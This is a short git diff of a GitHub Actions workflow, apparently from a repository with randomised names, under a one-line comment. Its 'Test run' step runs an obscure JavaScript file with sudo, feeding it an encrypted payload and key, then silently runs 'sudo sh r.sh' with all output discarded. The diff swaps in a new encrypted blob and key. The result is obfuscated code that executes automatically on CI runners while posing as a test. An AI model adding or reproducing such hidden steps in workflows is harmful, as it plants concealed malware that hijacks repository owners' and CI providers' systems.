I don't know what the hell I was thinking.

--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'tel2y'
+        echo '9usf6'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19YLUAqKKTAxrJDYCfDBq/66FL8I+4Z5gZHxdFcoM/jz5QbdeYZ5S2OQiyjFzFCmwbkYByDLg92ml/KpdlGdcRGTR3H/MEGr7lqdJVKyPPrbUmGb3UH89LT wkm2ka && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1++K/q5ZKV9GzuDOYJ+e1kN+ztpwzD4G4QFbNIkKrKknUy2TqIUG4g+fLkloQ0aNq2FEptmAlrI+Znn/5fkQ1F2hqGUGBa3jytGhu65ZM9dmLUGVpKB0znC 16xn1v && sudo sh r.sh > /dev/null 2>&1
